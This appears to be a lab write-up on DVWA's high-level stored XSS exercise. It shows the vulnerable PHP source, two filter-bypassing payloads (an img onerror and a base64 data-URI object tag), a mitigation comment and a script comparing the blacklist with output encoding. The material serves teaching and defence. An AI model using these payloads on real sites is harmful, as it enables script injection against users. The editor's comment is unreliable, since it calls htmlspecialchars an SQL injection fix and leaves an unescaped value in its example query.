DVWA XSS

dvwa, xss · Views: 11

Editor's comment

The code you provided is vulnerable to cross-site scripting (XSS) attacks. It allows an attacker to inject malicious code into the database by manipulating the `$name` variable.

**XSS Vulnerability:**

```html
<img src=1 onerror=alert('Youareattackedbyhacker4!')>
```

* The code inserts an `img` tag with an `onerror` attribute that alerts the user when an attack is detected.
* The attacker can set the `src` attribute to a malicious URL or a URL that contains a script that will be executed on the victim's browser.

**How to Mitigate XSS Vulnerability:**

* Escape any user-supplied input before using it in SQL queries or other operations.
* Use parameterized queries to prevent SQL injection attacks.
* Validate user input before displaying it on the web page.
* Use an HTML sanitizer to escape any malicious HTML tags.

**Example Mitigation:**

```php
$name = trim( $_POST[ 'txtName' ] );
$name = htmlspecialchars( $name );
$query = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
$result = mysql_query( $query, $conn ) or die( 'Error: ' . mysql_error() );
```

In this example, we first trim the user input and then escape it using `htmlspecialchars`. This prevents the SQL injection attack.

Main text

XSS Store

High level
<?php

if( isset( $_POST[ 'btnSign' ] ) ) {
    // Get input
    $message = trim( $_POST[ 'mtxMessage' ] );
    $name    = trim( $_POST[ 'txtName' ] );

    // Sanitize message input
    $message = strip_tags( addslashes( $message ) );
    $message = mysql_real_escape_string( $message );
    $message = htmlspecialchars( $message );

    // Sanitize name input
    $name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $name );
    $name = mysql_real_escape_string( $name );

    // Update database
    $query  = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
    $result = mysql_query( $query ) or die( '<pre>' . mysql_error() . '</pre>' );

    //mysql_close();
}

?>

payload1:

<img src=1 onerror=alert('Youareattackedbyhacker4!')>

payload2:
PS: this one would trigger XSS on 博客园 itself, so > is inserted first to work around that.

<>object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4="><>/object>

PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4= is the base64 encoding of <script>alert('xss')</script>
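As an added example (not DVWA's own code), the script below runs the high-level `$name` blacklist from the source above beside an output-encoding fix over the two payloads and a benign name, and reports whether a raw HTML tag survives each path. The `contains_raw_tag` check is a constructed heuristic and assumes the stored name is echoed into an HTML body context.

```php
<?php
// Added example, not DVWA's own code: the high-level name filter beside an
// output-encoding fix, run over constructed sample inputs (the page's two
// payloads, a plain script tag and a benign name).

// DVWA high level: a blacklist that only strips the letters s,c,r,i,p,t in
// order after a "<". mysql_real_escape_string is a SQL escape, not an HTML
// encoder, so it is left out here; it does not change the HTML result.
function filter_name_high(string $name): string {
    return preg_replace('/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $name);
}

// Hardened form: encode for the HTML context at the output boundary.
// ENT_QUOTES also covers single quotes inside attributes; charset is explicit.
function encode_for_html(string $name): string {
    return htmlspecialchars($name, ENT_QUOTES, 'UTF-8');
}

// Constructed heuristic: a stored value still carries a raw tag if an
// unencoded "<" is followed by an optional "/" and a letter.
function contains_raw_tag(string $html): bool {
    return preg_match('/<\s*\/?\s*[a-z]/i', $html) === 1;
}

$samples = [
    'benign'   => "Alice O'Brien",
    'payload1' => "<img src=1 onerror=alert('Youareattackedbyhacker4!')>",
    'payload2' => '<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4="></object>',
    'script'   => "<script>alert('xss')</script>",
];

foreach ($samples as $label => $input) {
    $weak = filter_name_high($input);   // what the high level stores
    $safe = encode_for_html($input);    // what an encoding fix stores
    printf("%-8s blacklist leaves a tag: %-3s | encoded leaves a tag: %s\n",
        $label,
        contains_raw_tag($weak) ? 'yes' : 'no',
        contains_raw_tag($safe) ? 'yes' : 'no');
}
```

Only the literal `<script>` sample is caught by the blacklist; the `img` and `object` payloads pass it untouched, while `htmlspecialchars` neutralises all four because it rewrites the `<` itself rather than guessing at tag names.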
